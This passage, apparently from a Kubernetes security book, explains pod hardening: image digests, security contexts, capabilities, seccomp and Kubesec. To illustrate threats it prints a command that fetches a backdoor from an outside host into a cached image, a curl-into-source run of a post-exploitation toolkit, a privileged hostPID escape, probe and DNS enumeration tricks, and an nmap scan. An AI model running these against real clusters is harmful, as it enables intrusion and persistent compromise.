  image: gcr.io/google-samples/microservices-demo/frontend:v0.2.3

Instead of using image tags, we can use the SHA256 image digests to pull the image by its content address:

  image: gcr.io/google-samples/microservices-demo/frontend@sha256:ca5c0f0771c89ec9dbfcbb4bfbbd9a048c25f7a625d97781920b35db6cecc19c

Images should always be referenced by SHA256, or use signed tags, otherwise it’s impossible to know what’s running as the label may have been updated in the registry since the container start. You can validate what’s being run by inspecting the running container for its image’s SHA256.

It’s possible to specify both a tag and an SHA256 digest in a Kubernetes image: key, in which case the tag is ignored and the image is retrieved by digest. This leads to potentially confusing image definitions such as controlplane/bizcard:latest@sha256:649f3a84b95ee84c86d70d50f42c6d43ce98099c927f49542c1eb85093953875 being retrieved as the image matching the SHA rather than the tag.
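
If you only have a tag, you can resolve it to its digest before pinning it in your manifests; one hedged approach using Docker:

# pull the tag, then read the content-addressable digest the registry served
docker pull gcr.io/google-samples/microservices-demo/frontend:v0.2.3
docker inspect --format '{{index .RepoDigests 0}}' \
    gcr.io/google-samples/microservices-demo/frontend:v0.2.3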

If an attacker can influence the local Kubelet image cache, they can add malicious code to an image and re-label it on the host node:

# load a malicious Bash/sh backdoor and overwrite the container's default CMD (/bin/sh)
$ docker run -it --cidfile=cidfile --entrypoint /bin/busybox \
    gcr.io/google-samples/microservices-demo/frontend:v0.2.3 \
    wget https://securi.fyi/b4shd00r -O /bin/sh

# commit the changed container using the same image name and tag
$ docker commit $(<cidfile) gcr.io/google-samples/microservices-demo/frontend:v0.2.3

# to run this again, don't forget to remove the cidfile

While the compromise of a local registry cache may lead to this attack, container cache access probably comes by rooting the node, and so this may be the least of your worries.

Note

The image pull policy of Always has a performance drawback in highly dynamic, “autoscaling from zero” environments such as Knative. When startup times are crucial, a potentially multi-second imagePullPolicy latency is unacceptable and image digests must be used.

This attack on a local image cache can be mitigated with an image pull policy of Always, which ensures the local tag matches what’s defined in the registry it’s pulled from. This is important and you should always be mindful of this setting:

    imagePullPolicy: Always

Typos in container image names, or registry names, will deploy unexpected code if an adversary has “typosquatted” the image with a malicious container.

This can be difficult to detect, for example, controlplan/hack instead of controlplane/hack. Tools like Notary protect against this by checking for valid signatures from trusted parties. If a TLS-intercepting middleware box intercepts and rewrites an image tag, a spoofed image may be deployed. Again, TUF and Notary side-channel signing mitigates against this, as do other container signing approaches like cosign, as discussed in Chapter 4.
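
Signature verification can be wired into CI or admission control; a minimal cosign sketch, assuming you hold the corresponding public key (the image reference is hypothetical):

# fails with a non-zero exit code if no valid signature matches the key
cosign verify --key cosign.pub registry.example.com/org/app:v1.0.0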

Pod probes

Your liveness probes should be tuned to your application’s performance characteristics, and used to keep them alive in the stormy waters of your production environment. Probes inform Kubernetes if the application is incapable of fulfilling its specified purpose, perhaps through a crash or external system failure.

The Kubernetes audit finding TOB-K8S-024 shows probes can be subverted by an attacker with the ability to schedule pods: without changing the pod’s command or args, they have the power to make network requests and execute commands within the target container. This yields local network discovery to an attacker, as the probes are executed by the Kubelet on the host networking interface, and not from within the pod.

A host header can be used here to enumerate the local network. Their proof of concept exploit:

apiVersion: v1
kind: Pod
# ...
livenessProbe:
  httpGet:
    host: 172.31.6.71
    path: /
    port: 8000
    httpHeaders:
    - name: Custom-Header
      value: Awesome

CPU and memory limits and requests

Resource limits and requests which manage the pod’s cgroups prevent the exhaustion of finite memory and compute resources on the Kubelet host, and defend from fork bombs and runaway processes. Networking bandwidth limits are not supported in the pod spec, but may be supported by your CNI implementation.

cgroups are a useful resource constraint. cgroups v2 offers more protection, but cgroups v1 are not a security boundary and they can be escaped easily.

Limits restrict the potential cryptomining or resource exhaustion that a malicious container can perform, and stop the host becoming overwhelmed by bad deployments. They have limited effectiveness against an adversary looking to further exploit the system, unless the attack itself is memory- or CPU-hungry.

    resources:
      limits:
        cpu: 200m
        memory: 128Mi
      requests:
        cpu: 100m
        memory: 64Mi

DNS

By default Kubernetes DNS servers provide all records for services across the cluster, preventing namespace segregation unless deployed individually per-namespace or domain.

Tip

CoreDNS supports policy plugins, including Open Policy Agent, to restrict access to DNS records and defeat the following enumeration attacks.

The default Kubernetes CoreDNS installation leaks information about its services, and offers an attacker a view of all possible network endpoints. Of course they may not all be accessible due to network policy.

DNS enumeration can be performed against a default, unrestricted CoreDNS installation. To retrieve all services in the cluster namespace:

root@hack-3-fc58fe02:/ [0]# dig +noall +answer srv any.any.svc.cluster.local | sort --human-numeric-sort --key 7
any.any.svc.cluster.local. 30   IN      SRV     0 6 53 kube-dns.kube-system.svc.cluster.local.
any.any.svc.cluster.local. 30   IN      SRV     0 6 80 frontend-external.default.svc.cluster.local.
any.any.svc.cluster.local. 30   IN      SRV     0 6 80 frontend.default.svc.cluster.local.
any.any.svc.cluster.local. 30   IN      SRV     0 6 443 kubernetes.default.svc.cluster.local.
any.any.svc.cluster.local. 30   IN      SRV     0 6 3550 productcatalogservice.default.svc.cluster.local.
# ...

For all service endpoints and names:

root@hack-3-fc58fe02:/ [0]# dig +noall +answer srv any.any.any.svc.cluster.local | sort --human-numeric-sort --key 7
any.any.any.svc.cluster.local. 30 IN    SRV     0 3 53 192-168-155-129.kube-dns.kube-system.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN    SRV     0 3 53 192-168-156-130.kube-dns.kube-system.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN    SRV     0 3 3550 192-168-156-133.productcatalogservice.default.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN    SRV     0 3 5050 192-168-156-131.checkoutservice.default.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN    SRV     0 3 6379 192-168-156-136.redis-cart.default.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN    SRV     0 3 6443 10-0-1-1.kubernetes.default.svc.cluster.local.
any.any.any.svc.cluster.local. 30 IN    SRV     0 3 7000 192-168-156-135.currencyservice.default.svc.cluster.local.
# ...

To return an IPv4 address based on the query:

root@hack-3-fc58fe02:/ [0]# dig +noall +answer 1-3-3-7.default.pod.cluster.local
1-3-3-7.default.pod.cluster.local. 23 IN A      1.3.3.7

Kubernetes API server service IP information is mounted into the pod’s environment by default:

root@test-pd:~ [0]# env | grep KUBE
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT_443_TCP=tcp://10.7.240.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.7.240.1
KUBERNETES_SERVICE_HOST=10.7.240.1
KUBERNETES_PORT=tcp://10.7.240.1:443
KUBERNETES_PORT_443_TCP_PORT=443

root@test-pd:~ [0]# curl -k https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}/version
{
  "major": "1",
  "minor": "19+",
  "gitVersion": "v1.19.9-gke.1900",
  "gitCommit": "008fd38bf3dc201bebdd4fe26edf9bf87478309a",
# ...

The response matches the API server’s /version endpoint.

Tip

Detect Kubernetes API servers with this nmap script and the following function:

nmap-kube-apiserver() {
  local REGEX="major.*gitVersion.*buildDate"
  local ARGS="${@:-$(kubectl config view --minify | awk '/server:/{print $2}' | sed -E -e 's,^https?://,,' -e 's,:, -p ,g')}"

  nmap --open -d \
    --script=http-get \
    --script-args "\
      http-get.path=/version, \
      http-get.match=\"${REGEX}\", \
      http-get.showResponse, \
      http-get.forceTls \
    " \
    ${ARGS}
}

Pod security context

This pod is running with an empty securityContext, which means that without admission controllers mutating the configuration at deployment time, the container can run a root-owned process and has all capabilities available to it:

  securityContext: {}

Exploiting the capability landscape involves an understanding of the kernel’s flags, and Stefano Lanaro’s guide provides a comprehensive overview.

Different capabilities may have particular impact on a system, and CAP_SYS_ADMIN and CAP_BPF are particularly enticing to an attacker. Notable capabilities you should be cautious about granting include:

  • CAP_DAC_OVERRIDE, CAP_CHOWN, CAP_DAC_READ_SEARCH, CAP_FOWNER, CAP_SETFCAP: bypass filesystem permissions

  • CAP_SETUID, CAP_SETGID: become the root user

  • CAP_NET_RAW: read network traffic

  • CAP_SYS_ADMIN: filesystem mount permission

  • CAP_SYS_PTRACE: all-powerful debugging of other processes

  • CAP_SYS_MODULE: load kernel modules to bypass controls

  • CAP_PERFMON, CAP_BPF: access deep-hooking BPF systems

These are the precursors for many container breakouts. As Brad Geesaman points out in Figure 2-11, processes want to be free! And an adversary will take advantage of anything within the pod they can use to escape.
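
Dropping every capability and adding back only what a workload demonstrably needs removes most of these precursors; a minimal sketch:

    securityContext:
      runAsNonRoot: true
      capabilities:
        drop:
        - ALL
        # add back individual capabilities only where proven necessary, e.g.:
        # add: ["NET_BIND_SERVICE"]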

Note

CAP_NET_RAW is enabled by default in runc, and enables UDP (which bypasses TCP service meshes like Istio), ICMP, and ARP poisoning attacks. Aqua found DNS poisoning attacks against Kubernetes DNS, so the capability should be dropped; the net.ipv4.ping_group_range sysctl allows unprivileged ICMP, so CAP_NET_RAW is not needed even where ping is required.

Some container breakouts requiring root and/or CAP_SYS_ADMIN, CAP_NET_RAW, CAP_BPF, or CAP_SYS_MODULE to function:

  • /proc/self/exe (described in Chapter 5)

  • Subpath volume mount traversal (described in Chapter 5)

  • CVE-2016-5195 (read-only memory copy-on-write race condition, aka DirtyCow, and detailed in “Architecting Containerised Applications for Resilience”).

  • CVE-2020-14386 (an unprivileged memory corruption bug that requires CAP_NET_RAW)

  • CVE-2021-30465 (runc mount destinations symlink-exchange swap to mount outside the rootfs, limited by use of unprivileged user)

  • CVE-2021-22555 (Netfilter heap out-of-bounds write that requires CAP_NET_RAW)

  • CVE-2021-31440 (eBPF out of bounds access to the Linux kernel requiring root or CAP_BPF, and CAP_SYS_MODULE)

  • @andreyknvl kernel bugs and core_pattern escape

When there’s no breakout, root capabilities are still required for a number of other attacks, such as CVE-2020-10749 (Kubernetes CNI plugin MitM attacks via IPv6 rogue router advertisements).

Tip

The excellent Compendium of Container Escapes goes into more detail on some of these attacks.

We enumerate the options available in a securityContext for a pod to defend itself from hostile containers in the runtime policies section.

Pod service accounts

Service accounts are JWTs (JSON Web Tokens) used by pods for authorisation against the Kubernetes API. The default service account shouldn’t be given any permissions, and by default comes with no authorisation.

A pod’s serviceAccount configuration defines its access privileges with the API server; see the service accounts section for the details. The service account is mounted into all pod replicas, which share this single “workload identity”.

  serviceAccount: default
  serviceAccountName: default

Segregating duty in this way reduces the blast radius if a pod is compromised: limiting an attacker post-intrusion is a primary goal of policy controls.
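
If a workload never talks to the API server, you can go further and prevent the token being mounted at all, alongside a dedicated least-privilege service account (the account name is hypothetical):

spec:
  serviceAccountName: frontend-sa
  automountServiceAccountToken: false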

Scheduler and tolerations

The scheduler is responsible for allocating a pod workload to a node. It looks as follows:

  schedulerName: default-scheduler
  tolerations:
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 300
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 300

A hostile scheduler could conceivably exfiltrate data or workloads from the cluster, but requires the cluster to be compromised in order to add it to the control plane. It would be easier to schedule a privileged container and root the control plane kubelets.

Pod volume definitions

Here we are using a bound service account token, defined in YAML as a projected service account token (instead of a standard service account). The Kubelet protects this against exfiltration by regularly rotating it (configured for every 3600 seconds, or one hour), so it’s only of limited use if stolen. An attacker with persistence is still able to use this value, and can observe it rotating, so this only protects the service account after the attack has completed.

  volumes:
  - name: kube-api-access-p282h
    projected:
      defaultMode: 420
      sources:
      - serviceAccountToken:
          expirationSeconds: 3600
          path: token
      - configMap:
          items:
          - key: ca.crt
            path: ca.crt
          name: kube-root-ca.crt
      - downwardAPI:
          items:
          - fieldRef:
              apiVersion: v1
              fieldPath: metadata.namespace
            path: namespace

Volumes are a rich source of potential data for an attacker, and you should ensure that standard security practices like discretionary access control (DAC, e.g. file ownership and permissions) are correctly configured.

Tip

The downwardAPI reflects Kubernetes-level values into the containers in the pod, and is useful to expose things like the pod’s name, namespace, UID, and labels and annotations into the container. Its capabilities are listed in the docs.

The container is just Linux and will not protect incorrectly configured data.

Pod network status

Network information about the pod is useful to debug containers without services, or that aren’t responding as they should, but an attacker might use this information to connect directly to a pod without scanning the network.

status:
  hostIP: 10.0.1.3
  phase: Running
  podIP: 192.168.155.130
  podIPs:
  - ip: 192.168.155.130

Using the security context correctly

A pod is more likely to be compromised if a securityContext is not configured, or is too permissive. It is your most effective tool to prevent container breakout.

Once an attacker gains an RCE into a running pod, the security context is the first line of defensive configuration available to you as a defender. It exposes kernel switches that can be set individually, and additional Linux Security Modules can be configured with fine-grained policies that prevent hostile applications taking advantage of your systems.

Docker’s containerd has a default seccomp profile that has prevented some zero-day attacks against the container runtime by blocking system calls in the kernel. From Kubernetes v1.22 you should enable this by default for all runtimes with the --seccomp-default Kubelet flag. In some cases workloads may not run with the default profile: observability or security tools may require low-level kernel access. These workloads should have custom seccomp profiles written (rather than resorting to running them Unconfined, which allows any system call).

Here’s an example of a fine-grained seccomp profile loaded from the host’s filesystem under /var/lib/kubelet/seccomp:

  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: profiles/fine-grained.json
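
Where no custom profile is needed, the runtime’s default profile can also be requested per-workload, which is the same profile the --seccomp-default flag applies cluster-wide:

  securityContext:
    seccompProfile:
      type: RuntimeDefault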

Seccomp is for system calls, but SELinux and AppArmor can monitor and enforce policy in userspace too, protecting files, directories, and devices.

SELinux is able to block most container breakouts with its label-based approach to filesystem and process access: it doesn’t allow containers to write anywhere but their own filesystem, nor to read other directories, and it comes enabled on OpenShift and Red Hat Linuxes.

AppArmor can similarly monitor and prevent many attacks in Debian Linuxes. If AppArmor is enabled then cat /sys/module/apparmor/parameters/enabled returns Y, and it can be used in pod definitions:

metadata:
  annotations:
    container.apparmor.security.beta.kubernetes.io/hello: localhost/k8s-apparmor-example-deny-write

The privileged flag was quoted as being “the most dangerous flag in the history of computing” by Liz Rice, but why are privileged containers so dangerous? Because they leave the process namespace enabled to give the illusion of containerisation, but actually disable all security features.

“Privileged” is a specific securityContext configuration: all but the process namespace is disabled, virtual filesystems are unmasked, LSMs are disabled, and all capabilities are granted.

Running as a non-root user without capabilities, and setting allowPrivilegeEscalation to false, provides robust protection against many privilege escalations.

spec:
  containers:
  - image: controlplane/hack
    securityContext:
      allowPrivilegeEscalation: false

The granularity of security contexts means each property of the configuration must be tested to ensure it is not set: as a defender by configuring admission control and testing YAML; as an attacker with a dynamic test (or amicontained) at runtime.

Tip

We explore how to detect privileges inside a container later in this chapter.

Sharing namespaces with the host also reduces the isolation of the container and opens it to greater potential risk. Any mounted filesystems effectively add to the mount namespace.

Ensure your pods’ securityContext configuration is correct, and your systems will be safer against known attacks.

Enhancing the securityContext with Kubesec

Kubesec is a simple tool to validate the security of a Kubernetes resource.

It returns a risk score for the resource, and advises on how to tighten the security context:

$ cat <<EOF > kubesec-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: kubesec-demo
spec:
  containers:
  - name: kubesec-demo
    image: gcr.io/google-samples/node-hello:1.0
    securityContext:
      readOnlyRootFilesystem: true
EOF

$ docker run -i kubesec/kubesec:2.11.1 scan - < kubesec-test.yaml
[
  {
    "object": "Pod/kubesec-demo.default",
    "valid": true,
    "fileName": "STDIN",
    "message": "Passed with a score of 1 points",
    "score": 1,
    "scoring": {
      "passed": [
        {
          "id": "ReadOnlyRootFilesystem",
          "selector": "containers[] .securityContext .readOnlyRootFilesystem == true",
          "reason": "An immutable root filesystem can prevent malicious binaries being added to PATH and inc
rease attack cost",
          "points": 1
        }
      ],
      "advise": [
        {
          "id": "ApparmorAny",
          "selector": ".metadata .annotations ."container.apparmor.security.beta.kubernetes.io/nginx"",
          "reason": "Well defined AppArmor policies may provide greater protection from unknown threats. WARNING: NOT PRODUCTION READY",
          "points": 3
        },
        {
          "id": "ServiceAccountName",
          "selector": ".spec .serviceAccountName",
          "reason": "Service accounts restrict Kubernetes API access and should be configured with least privilege",
          "points": 3
        },
        {
          "id": "SeccompAny",
          "selector": ".metadata .annotations ."container.seccomp.security.alpha.kubernetes.io/pod"",
          "reason": "Seccomp profiles set minimum privilege and secure against unknown threats",
          "points": 1
        },
# ...

Kubesec.io documents practical changes to make to your security context, and we’ll cover some of them here.

Tip

Shopify’s excellent kubeaudit provides similar functionality for all resources in a cluster.

Hardened securityContext

The NSA published a Kubernetes Hardening Guidance document that recommends a hardened set of securityContext standards. It also advises scanning for vulnerabilities and misconfigurations, least privilege, good RBAC and IAM, network firewalling and encryption, and that you “periodically review all Kubernetes settings and use vulnerability scans to help ensure risks are appropriately accounted for and security patches are applied”.

Assigning least privilege to a container in a pod is the responsibility of the securityContext.

Note

PodSecurityPolicy maps onto the configuration flags available in a Pod or Container’s securityContext.


Let’s explore the securityContext settings in more detail using the kubesec static analysis tool, and the selectors it uses to interrogate your Kubernetes resources:

  • containers[] .securityContext .privileged

A running privileged container is potentially a bad day for your security team. Privileged containers disable namespaces (except the process namespace) and LSMs, grant all capabilities, expose the host’s devices through /dev, and generally make things insecure by default. This is the first thing an attacker looks for in a newly compromised pod.

  • .spec .hostPID

hostPID allows traversal from the container to the host through the /proc filesystem, which symlinks other processes’ root filesystems. To read from the host’s process namespace, privileged is needed as well:

user@host $ kubectl run privileged-and-hostpid --restart=Never -ti --rm \
  --image lol --overrides \
  '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["/bin/sh"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'  # 1

/ $ grep PRETTY_NAME /etc/*release*  # 2
PRETTY_NAME="Alpine Linux v3.13"

/ $ ps faux | head  # 3
PID   USER     TIME  COMMAND
    1 root      0:07 /usr/lib/systemd/systemd noresume noswap cros_efi
    2 root      0:00 [kthreadd]
    3 root      0:00 [rcu_gp]
    4 root      0:00 [rcu_par_gp]
    6 root      0:00 [kworker/0:0H-kb]
    9 root      0:00 [mm_percpu_wq]
   10 root      0:00 [ksoftirqd/0]
   11 root      1:33 [rcu_sched]
   12 root      0:00 [migration/0]

/ $ grep PRETTY_NAME /proc/1/root/etc/*rel*  # 4
/proc/1/root/etc/os-release:PRETTY_NAME="Container-Optimized OS from Google"
1. Start a privileged container and share the host process namespace.
2. Check the distribution version inside the container.
3. Verify we’re in the host’s process namespace (we can see PID 1, and kernel helper processes).
4. Check the distribution version of the host, via the /proc filesystem.

Note

Without privileged, the host process namespace is inaccessible to root in the container:

/ $ grep PRETTY_NAME /proc/1/root/etc/*release*
grep: /proc/1/root/etc/*release*: Permission denied

In this case the attacker is limited to searching the filesystem or memory as their UID allows, hunting for key material or sensitive data.

  • .spec .hostNetwork

Host networking access allows us to sniff traffic or send fake traffic over the host adapter (but only if we have permission to do so, enabled by root and CAP_NET_RAW or CAP_NET_ADMIN), and evade network policy (which depends on traffic originating from the expected source IP of the adapter in the pod’s network namespace).

It also grants access to services bound to the host’s loopback adapter (localhost in the root network namespace) that traditionally was considered a security boundary. Server Side Request Forgery (SSRF) attacks have reduced the incidence of this pattern, but it may still exist (Kubernetes’ API server --insecure-port used this pattern until it was deprecated in v1.10 and finally removed in v1.20).
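The setting itself is a single pod-level boolean, which makes it easy to flag in admission control; a minimal sketch of the pattern to look for (the container name and image are illustrative):

spec:
  hostNetwork: true
  containers:
  - name: app                  # illustrative name
    image: controlplane/hack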

  • .spec .hostAliases

Permits pods to override their local /etc/hosts files. This may have more operational implications (like not being updated in a timely manner and causing an outage) than security connotations.
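The field adds entries to the pod’s /etc/hosts; a minimal sketch (the IP and hostname are illustrative):

spec:
  hostAliases:
  - ip: "10.0.0.50"            # illustrative entry
    hostnames:
    - "payments.internal"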

  • .spec .hostIPC

Gives the pod access to the host’s Interprocess Communication namespace, where it may be able to interfere with trusted processes on the host. It’s likely this will enable simple host compromise via /usr/bin/ipcs or files in shared memory at /dev/shm.

  • containers[] .securityContext .runAsNonRoot

The root user has special permissions and privileges in a Linux system, and this is no different within a container (although they are reduced).

Preventing root from owning the processes inside the container is a simple and effective security measure. It stops many of the container breakout attacks listed in this book, and adheres to standard and established Linux security practice.

  • containers[] .securityContext .runAsUser > 10000

In addition to preventing root from running processes, enforcing high UIDs for containerised processes lowers the risk of breakout where user namespaces are not in use: if the user in the container (e.g. 12345) has an equivalent UID on the host (that is, also 12345), and the container can reach host resources through a mounted volume or shared namespace, then resources may accidentally be shared and allow container breakout (e.g. via filesystem permissions and authorisation checks).
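Both measures can be expressed in the securityContext; a minimal sketch using an arbitrary high UID and GID:

  securityContext:
    runAsNonRoot: true
    runAsUser: 12345
    runAsGroup: 12345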

  • containers[] .securityContext .readOnlyRootFilesystem

Immutability is not a security boundary as code can be downloaded from the internet and run by an interpreter (such as Bash, PHP, and Java) without using the filesystem, as the bashark post-exploitation toolkit shows:

root@r00t:/tmp [0]# source <(curl -s \
  https://raw.githubusercontent.com/redcode-labs/Bashark/master/bashark.sh)

[Bashark ASCII-art banner]

[*] Type 'help' to show available commands

bashark_2.0$

Filesystem locations like /tmp and /dev/shm will probably always be writable to support application behaviour, and so a read-only root filesystem cannot be relied upon as a security boundary. Immutability protects against some drive-by and automated attacks, but it is not a robust security boundary.
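A common pattern is to make the root filesystem read-only and mount an emptyDir over the specific paths an application genuinely needs to write to; a minimal sketch (the container name and mount path are illustrative):

spec:
  containers:
  - name: app                  # illustrative name
    image: controlplane/hack
    securityContext:
      readOnlyRootFilesystem: true
    volumeMounts:
    - name: tmp
      mountPath: /tmp
  volumes:
  - name: tmp
    emptyDir: {}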

Intrusion detection tools such as Falco and tracee can detect new Bash shells spawned in a container (or any non-allowlisted applications). Additionally, tracee can detect in-memory execution of malware that attempts to hide itself, by observing /proc/<pid>/maps for memory that was once writeable but is now executable.

Note

We look at Falco in more detail in Chapter 9.

  • containers[] .securityContext .capabilities .drop | index("ALL")

You should always drop all capabilities and only re-add those that your application needs to operate.
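For example, a web server that binds to port 80 as a non-root user might drop everything and re-add only NET_BIND_SERVICE; a minimal sketch:

  securityContext:
    capabilities:
      drop:
      - ALL
      add:
      - NET_BIND_SERVICE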

  • containers[] .securityContext .capabilities .add | index("SYS_ADMIN")

The presence of this capability is a red flag: try to find another way to deploy any container that requires this, or deploy into a dedicated namespace with custom security rules to limit the impact of compromise.

  • containers[] .resources .limits .cpu, .memory

Limiting the total amount of memory available to a container prevents denial-of-service attacks from taking out the host machine, as the container dies first (a combined example follows the next selector).

  • containers[] .resources .requests .cpu, .memory

Requesting resources helps the scheduler to “bin pack” resources effectively, and doesn’t have any security connotations beyond a hostile API client trying to squeeze more pods onto a specific node.
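Both requests and limits are set per container; a minimal sketch with illustrative values:

  containers:
  - name: app                  # illustrative name
    image: controlplane/hack
    resources:
      requests:
        cpu: 100m
        memory: 128Mi
      limits:
        cpu: 500m
        memory: 256Mi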

  • .spec .volumes[] .hostPath .path

A writable /var/run/docker.sock host mount allows breakout to the host. Any filesystem that an attacker can write a symlink to is vulnerable, and an attacker can use that path to explore and exfiltrate from the host.
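The pattern for admission control to reject looks like this; a minimal sketch (the names are illustrative):

spec:
  containers:
  - name: app                  # illustrative name
    image: controlplane/hack
    volumeMounts:
    - name: docker-sock
      mountPath: /var/run/docker.sock
  volumes:
  - name: docker-sock
    hostPath:
      path: /var/run/docker.sock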

Into the eye of the storm

The Captain and crew have had a fruitless raid, but this is not the last we will hear of their escapades.

If we zoom in on the relationship between a single pod and the host in Figure 2-12, we can see the services offered to the container by the Kubelet and potential security boundaries that may keep an adversary at bay.

Pod Architecture
Figure 2-12. Pod architecture

As we progress through this book, we will see how these components interact, and we will witness Captain Hashjack’s efforts to exploit them.

Conclusion

There are multiple layers of configuration to secure for a pod to be used safely, and the workloads you run are the soft underbelly of Kubernetes security.

The pod is the first line of defence and the most important part of a cluster to protect. Application code changes frequently and is likely to be a source of potentially exploitable bugs.

To extend the anchor and chain metaphor, a cluster is only as strong as its weakest link. In order to be provably secure, you must use robust configuration testing, preventative control and policy in the pipeline and admission control, and runtime intrusion detection, as nothing is infallible.
